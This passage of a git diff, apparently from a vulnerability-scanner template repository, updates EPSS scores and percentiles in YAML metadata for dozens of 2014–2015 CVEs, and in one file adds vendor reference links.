0.01386 - epss-percentile: 0.8483 + epss-percentile: 0.84917 cpe: cpe:2.3:a:webedition:webedition_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml index 34942a093e..43fedebbb6 100644 --- a/http/cves/2014/CVE-2014-5368.yaml +++ b/http/cves/2014/CVE-2014-5368.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-5368 cwe-id: CWE-22 epss-score: 0.09191 - epss-percentile: 0.94048 + epss-percentile: 0.9408 cpe: cpe:2.3:a:wp_content_source_control_project:wp_content_source_control:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-6287.yaml b/http/cves/2014/CVE-2014-6287.yaml index 1eaffcd068..7956563b46 100644 --- a/http/cves/2014/CVE-2014-6287.yaml +++ b/http/cves/2014/CVE-2014-6287.yaml @@ -22,7 +22,7 @@ info: cve-id: 'CVE-2014-6287' cwe-id: CWE-94 epss-score: 0.97289 - epss-percentile: 0.9984 + epss-percentile: 0.99841 cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml index 7c5e4528d2..a50eacabbf 100644 --- a/http/cves/2014/CVE-2014-6308.yaml +++ b/http/cves/2014/CVE-2014-6308.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-6308 cwe-id: CWE-22 epss-score: 0.0922 - epss-percentile: 0.94061 + epss-percentile: 0.9409 cpe: cpe:2.3:a:osclass:osclass:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml index 097d139294..6e8fa6115c 100644 --- a/http/cves/2014/CVE-2014-8676.yaml +++ b/http/cves/2014/CVE-2014-8676.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2014-8676 cwe-id: CWE-22 epss-score: 0.00195 - epss-percentile: 0.57235 + epss-percentile: 0.57408 cpe: cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index b796dc21a7..2ef9a8aa90 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2014-8682 cwe-id: CWE-89 epss-score: 0.00808 - epss-percentile: 0.79761 + epss-percentile: 0.79839 cpe: cpe:2.3:a:gogits:gogs:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml index 2bd03dd962..1024ca7d24 100644 --- a/http/cves/2014/CVE-2014-8799.yaml +++ b/http/cves/2014/CVE-2014-8799.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-8799 cwe-id: CWE-22 epss-score: 0.17844 - epss-percentile: 0.95645 + epss-percentile: 0.95686 cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index 8228f76137..a374c1f0a1 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-9094 cwe-id: CWE-79 epss-score: 0.32637 - epss-percentile: 0.96588 + epss-percentile: 0.96617 cpe: cpe:2.3:a:digitalzoomstudio:video_gallery:-:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9119.yaml b/http/cves/2014/CVE-2014-9119.yaml index 4d8ec043d4..8c76d8151c 100644 --- a/http/cves/2014/CVE-2014-9119.yaml +++ b/http/cves/2014/CVE-2014-9119.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2014-9119 cwe-id: CWE-22 epss-score: 0.10505 - epss-percentile: 0.94438 + epss-percentile: 0.94469 cpe: cpe:2.3:a:db_backup_project:db_backup:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9180.yaml b/http/cves/2014/CVE-2014-9180.yaml index 7632df9825..9ed759e497 100644 --- a/http/cves/2014/CVE-2014-9180.yaml +++ b/http/cves/2014/CVE-2014-9180.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9180 cwe-id: CWE-601 epss-score: 0.00248 - epss-percentile: 0.62554 + epss-percentile: 0.62704 cpe: cpe:2.3:a:eleanor-cms:eleanor_cms:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml index 85b035104f..b4e5401d88 100644 --- a/http/cves/2014/CVE-2014-9444.yaml +++ b/http/cves/2014/CVE-2014-9444.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-9444 cwe-id: CWE-79 epss-score: 0.00287 - epss-percentile: 0.65337 + epss-percentile: 0.65501 cpe: cpe:2.3:a:frontend_uploader_project:frontend_uploader:0.9.2:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml index cb463199e7..87d1b5df14 100644 --- a/http/cves/2014/CVE-2014-9606.yaml +++ b/http/cves/2014/CVE-2014-9606.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-9606 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41182 + epss-percentile: 0.41261 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index 6b2e3c8af0..9b495cf2af 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-9607 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41182 + epss-percentile: 0.41261 cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index 4cdf4b7ca7..4d07d3afd6 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-9608 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41182 + epss-percentile: 0.41261 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9609.yaml b/http/cves/2014/CVE-2014-9609.yaml index a255366ae5..c5631951fd 100644 --- a/http/cves/2014/CVE-2014-9609.yaml +++ b/http/cves/2014/CVE-2014-9609.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-9609 cwe-id: CWE-22 epss-score: 0.00153 - epss-percentile: 0.514 + epss-percentile: 0.51465 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml index 45d2332e61..637d1eebc6 100644 --- a/http/cves/2014/CVE-2014-9614.yaml +++ b/http/cves/2014/CVE-2014-9614.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-9614 cwe-id: CWE-798 epss-score: 0.01433 - epss-percentile: 0.85071 + epss-percentile: 0.85173 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9615.yaml b/http/cves/2014/CVE-2014-9615.yaml index c891e01855..d3d040365b 100644 --- a/http/cves/2014/CVE-2014-9615.yaml +++ b/http/cves/2014/CVE-2014-9615.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-9615 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41182 + epss-percentile: 0.41261 cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml index 8b13e03998..26c603b3ab 100644 --- a/http/cves/2014/CVE-2014-9617.yaml +++ b/http/cves/2014/CVE-2014-9617.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-9617 cwe-id: CWE-601 epss-score: 0.00109 - epss-percentile: 0.43724 + epss-percentile: 0.43796 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml index a95fd3fa6a..5b33b9a5a1 100644 --- a/http/cves/2014/CVE-2014-9618.yaml +++ b/http/cves/2014/CVE-2014-9618.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-9618 cwe-id: CWE-287 epss-score: 0.03433 - epss-percentile: 0.90458 + epss-percentile: 0.90527 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-0554.yaml b/http/cves/2015/CVE-2015-0554.yaml index 40e9571c47..122d314988 100644 --- a/http/cves/2015/CVE-2015-0554.yaml +++ b/http/cves/2015/CVE-2015-0554.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.4 cve-id: CVE-2015-0554 cwe-id: CWE-264 - epss-score: 0.01391 - epss-percentile: 0.84862 + epss-score: 0.0139 + epss-percentile: 0.84939 cpe: cpe:2.3:o:adb:p.dga4001n_firmware:pdg_tef_sp_4.06l.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml index ed924e1d46..cdfd464d15 100644 --- a/http/cves/2015/CVE-2015-1000005.yaml +++ b/http/cves/2015/CVE-2015-1000005.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-1000005 cwe-id: CWE-22 epss-score: 0.05243 - epss-percentile: 0.92197 + epss-percentile: 0.92257 cpe: cpe:2.3:a:candidate-application-form_project:candidate-application-form:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-1000010.yaml b/http/cves/2015/CVE-2015-1000010.yaml index 379b30606c..8830878e91 100644 --- a/http/cves/2015/CVE-2015-1000010.yaml +++ b/http/cves/2015/CVE-2015-1000010.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-1000010 cwe-id: CWE-284 epss-score: 0.03171 - epss-percentile: 0.9009 + epss-percentile: 0.90143 cpe: cpe:2.3:a:simple-image-manipulator_project:simple-image-manipulator:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-1000012.yaml b/http/cves/2015/CVE-2015-1000012.yaml index 7bb0f2724e..393429e039 100644 --- a/http/cves/2015/CVE-2015-1000012.yaml +++ b/http/cves/2015/CVE-2015-1000012.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-1000012 cwe-id: CWE-200 epss-score: 0.00773 - epss-percentile: 0.79234 + epss-percentile: 0.79326 cpe: cpe:2.3:a:mypixs_project:mypixs:0.3:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml index ad69e1dce4..7a141136dc 100644 --- a/http/cves/2015/CVE-2015-1427.yaml +++ b/http/cves/2015/CVE-2015-1427.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-1427 cwe-id: CWE-284 epss-score: 0.8674 - epss-percentile: 0.98305 + epss-percentile: 0.98344 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index 4d92c3fe50..d17642be4e 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2015-1503 cwe-id: CWE-22 - epss-score: 0.91941 - epss-percentile: 0.98685 + epss-score: 0.90421 + epss-percentile: 0.98569 cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml index e0a4128139..8276389385 100644 --- a/http/cves/2015/CVE-2015-1579.yaml +++ b/http/cves/2015/CVE-2015-1579.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2015-1579 cwe-id: CWE-22 epss-score: 0.90145 - epss-percentile: 0.98515 + epss-percentile: 0.9855 cpe: cpe:2.3:a:elegant_themes:divi:-:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index c466aac4d6..285179902c 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-1880 cwe-id: CWE-79 epss-score: 0.00201 - epss-percentile: 0.57857 + epss-percentile: 0.58021 cpe: cpe:2.3:o:fortinet:fortios:5.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index 8949bbf278..072a9f2976 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5 cve-id: CVE-2015-2067 cwe-id: CWE-22 - epss-score: 0.01338 - epss-percentile: 0.84528 + epss-score: 0.01003 + epss-percentile: 0.81971 cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index d7e391a72c..21f145f6dc 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-2068 cwe-id: CWE-79 epss-score: 0.00146 - epss-percentile: 0.50282 + epss-percentile: 0.50386 cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-2080.yaml b/http/cves/2015/CVE-2015-2080.yaml index a581c39e14..872216773e 100644 --- a/http/cves/2015/CVE-2015-2080.yaml +++ b/http/cves/2015/CVE-2015-2080.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-2080 cwe-id: CWE-200 epss-score: 0.95465 - epss-percentile: 0.99207 + epss-percentile: 0.99229 cpe: cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml index 5b19002618..0484abf2c2 100644 --- a/http/cves/2015/CVE-2015-2166.yaml +++ b/http/cves/2015/CVE-2015-2166.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-2166 cwe-id: CWE-22 epss-score: 0.23272 - epss-percentile: 0.96082 + epss-percentile: 0.96116 cpe: cpe:2.3:a:ericsson:drutt_mobile_service_delivery_platform:4.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index 40d2f4671d..ae0135d343 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-2196 cwe-id: CWE-89 epss-score: 0.0093 - epss-percentile: 0.81172 + epss-percentile: 0.81239 cpe: cpe:2.3:a:web-dorado:spider_calendar:1.4.9:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index dcd3cf0360..95573ddca7 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2015-2755 cwe-id: CWE-352 epss-score: 0.02569 - epss-percentile: 0.89075 + epss-percentile: 0.89129 cpe: cpe:2.3:a:ab_google_map_travel_project:ab_google_map_travel:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-2794.yaml b/http/cves/2015/CVE-2015-2794.yaml index fe3ac288a1..4d32895f9d 100644 --- a/http/cves/2015/CVE-2015-2794.yaml +++ b/http/cves/2015/CVE-2015-2794.yaml @@ -9,19 +9,22 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2015-2794 - https://www.exploit-db.com/exploits/39777 + - http://www.dnnsoftware.com/community-blog/cid/155198/workaround-for-potential-security-issue + - http://www.dnnsoftware.com/community/security/security-center + - https://dotnetnuke.codeplex.com/releases/view/615317 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2015-2794 cwe-id: CWE-264 - epss-score: 0.9711 - epss-percentile: 0.99736 + epss-score: 0.97458 + epss-percentile: 0.99953 cpe: cpe:2.3:a:dotnetnuke:dotnetnuke:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 vendor: dotnetnuke product: dotnetnuke - verified: true fofo-query: app="DotNetNuke" tags: cve,cve2015,dotnetnuke,auth-bypass,install diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index 416ca5e50a..64853132c4 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-2807 cwe-id: CWE-79 epss-score: 0.00469 - epss-percentile: 0.7282 + epss-percentile: 0.72949 cpe: cpe:2.3:a:documentcloud:navis_documentcloud:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml index 868a79a466..3bf4beaf9e 100644 --- a/http/cves/2015/CVE-2015-2863.yaml +++ b/http/cves/2015/CVE-2015-2863.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-2863 cwe-id: CWE-601 epss-score: 0.00626 - epss-percentile: 0.76595 + epss-percentile: 0.76692 cpe: cpe:2.3:a:kaseya:virtual_system_administrator:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml index 1f1fb1103b..65db1e9243 100644 --- a/http/cves/2015/CVE-2015-2996.yaml +++ b/http/cves/2015/CVE-2015-2996.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-2996 cwe-id: CWE-22 epss-score: 0.77754 - epss-percentile: 0.9793 + epss-percentile: 0.97955 cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml index acf69a11a0..c4f5d34a47 100644 --- a/http/cves/2015/CVE-2015-3035.yaml +++ b/http/cves/2015/CVE-2015-3035.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2015-3035 cwe-id: CWE-22 epss-score: 0.58993 - epss-percentile: 0.97416 + epss-percentile: 0.97444 cpe: cpe:2.3:o:tp-link:tl-wr841n_\(9.0\)_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml index 7f2a2eb4fe..371db119c4 100644 --- a/http/cves/2015/CVE-2015-3224.yaml +++ b/http/cves/2015/CVE-2015-3224.yaml @@ -20,8 +20,8 @@ info: cvss-score: 4.3 cve-id: CVE-2015-3224 cwe-id: CWE-284 - epss-score: 0.94355 - epss-percentile: 0.99007 + epss-score: 0.94661 + epss-percentile: 0.99077 cpe: cpe:2.3:a:rubyonrails:web_console:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml index ad4e273dfd..4a89dafedd 100644 --- a/http/cves/2015/CVE-2015-3337.yaml +++ b/http/cves/2015/CVE-2015-3337.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-3337 cwe-id: CWE-22 epss-score: 0.96447 - epss-percentile: 0.99466 + epss-percentile: 0.9948 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-3648.yaml b/http/cves/2015/CVE-2015-3648.yaml index fbbe025d59..c0c2625651 100644 --- a/http/cves/2015/CVE-2015-3648.yaml +++ b/http/cves/2015/CVE-2015-3648.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-3648 cwe-id: CWE-22 epss-score: 0.02644 - epss-percentile: 0.89232 + epss-percentile: 0.89282 cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml index caf7533128..17e6fb57d9 100644 --- a/http/cves/2015/CVE-2015-3897.yaml +++ b/http/cves/2015/CVE-2015-3897.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-3897 cwe-id: CWE-22 epss-score: 0.83225 - epss-percentile: 0.98132 + epss-percentile: 0.98161 cpe: cpe:2.3:a:bonitasoft:bonita_bpm_portal:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml index be416ec975..ce8ec19fcf 100644 --- a/http/cves/2015/CVE-2015-4050.yaml +++ b/http/cves/2015/CVE-2015-4050.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-4050 cwe-id: CWE-284 epss-score: 0.00847 - epss-percentile: 0.80203 + epss-percentile: 0.80303 cpe: cpe:2.3:a:sensiolabs:symfony:2.3.19:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index c7161a01c7..7b0dddc68f 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.5 cve-id: CVE-2015-4062 cwe-id: CWE-89 - epss-score: 0.03004 - epss-percentile: 0.89842 + epss-score: 0.03919 + epss-percentile: 0.91099 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml index fa067736ff..0bbd75c211 100644 --- a/http/cves/2015/CVE-2015-4063.yaml +++ b/http/cves/2015/CVE-2015-4063.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-4063 cwe-id: CWE-79 epss-score: 0.04016 - epss-percentile: 0.9111 + epss-percentile: 0.91176 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml index 32ba0bee7f..aef2a64789 100644 --- a/http/cves/2015/CVE-2015-4074.yaml +++ b/http/cves/2015/CVE-2015-4074.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-4074 cwe-id: CWE-22 epss-score: 0.00598 - epss-percentile: 0.75973 + epss-percentile: 0.76066 cpe: cpe:2.3:a:helpdesk_pro_project:helpdesk_pro:*:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index 0a060051c8..ce24a9383b 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-4127 cwe-id: CWE-79 epss-score: 0.0034 - epss-percentile: 0.68233 + epss-percentile: 0.68397 cpe: cpe:2.3:a:church_admin_project:church_admin:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4414.yaml b/http/cves/2015/CVE-2015-4414.yaml index b9bedd10b8..71c826eed5 100644 --- a/http/cves/2015/CVE-2015-4414.yaml +++ b/http/cves/2015/CVE-2015-4414.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5 cve-id: CVE-2015-4414 cwe-id: CWE-22 - epss-score: 0.11221 - epss-percentile: 0.94621 + epss-score: 0.12486 + epss-percentile: 0.94904 cpe: cpe:2.3:a:se_html5_album_audio_player_project:se_html5_album_audio_player:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml index 4cb0a7f5b0..e0a8b9c802 100644 --- a/http/cves/2015/CVE-2015-4632.yaml +++ b/http/cves/2015/CVE-2015-4632.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-4632 cwe-id: CWE-22 epss-score: 0.0282 - epss-percentile: 0.89554 + epss-percentile: 0.8961 cpe: cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml index dc4d739857..cc93be21f1 100644 --- a/http/cves/2015/CVE-2015-4666.yaml +++ b/http/cves/2015/CVE-2015-4666.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-4666 cwe-id: CWE-22 epss-score: 0.02372 - epss-percentile: 0.88669 + epss-percentile: 0.88729 cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml index c65d9fe3bd..be4df39252 100644 --- a/http/cves/2015/CVE-2015-4668.yaml +++ b/http/cves/2015/CVE-2015-4668.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2015-4668 cwe-id: CWE-601 epss-score: 0.00397 - epss-percentile: 0.70575 + epss-percentile: 0.70742 cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml index 2520deca2c..973b0f6168 100644 --- a/http/cves/2015/CVE-2015-4694.yaml +++ b/http/cves/2015/CVE-2015-4694.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-4694 cwe-id: CWE-22 epss-score: 0.02304 - epss-percentile: 0.88507 + epss-percentile: 0.88562 cpe: cpe:2.3:a:zip_attachments_project:zip_attachments:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-5354.yaml b/http/cves/2015/CVE-2015-5354.yaml index 7268acf731..b4bb016942 100644 --- a/http/cves/2015/CVE-2015-5354.yaml +++ b/http/cves/2015/CVE-2015-5354.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-5354 cwe-id: CWE-601 epss-score: 0.00166 - epss-percentile: 0.53076 + epss-percentile: 0.53167 cpe: cpe:2.3:a:novius-os:novius_os:5.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index 57a0d918a8..b26657754f 100644 --- a/http/cves/2015/CVE-2015-5461.yaml +++ b/http/cves/2015/CVE-2015-5461.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-5461 cwe-id: NVD-CWE-Other epss-score: 0.0055 - epss-percentile: 0.74894 + epss-percentile: 0.75034 cpe: cpe:2.3:a:stageshow_project:stageshow:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml index 2529d4786f..02a806a06d 100644 --- a/http/cves/2015/CVE-2015-5469.yaml +++ b/http/cves/2015/CVE-2015-5469.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-5469 cwe-id: CWE-22 epss-score: 0.02176 - epss-percentile: 0.88164 + epss-percentile: 0.88215 cpe: cpe:2.3:a:mdc_youtube_downloader_project:mdc_youtube_downloader:2.1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index 42cabb8cc6..18b3feef29 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-5471 cwe-id: CWE-22 epss-score: 0.10406 - epss-percentile: 0.94414 + epss-percentile: 0.94447 cpe: cpe:2.3:a:swim_team_project:swim_team:1.44.10777:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml index 1814bc9326..772f7af1c7 100644 --- a/http/cves/2015/CVE-2015-5531.yaml +++ b/http/cves/2015/CVE-2015-5531.yaml 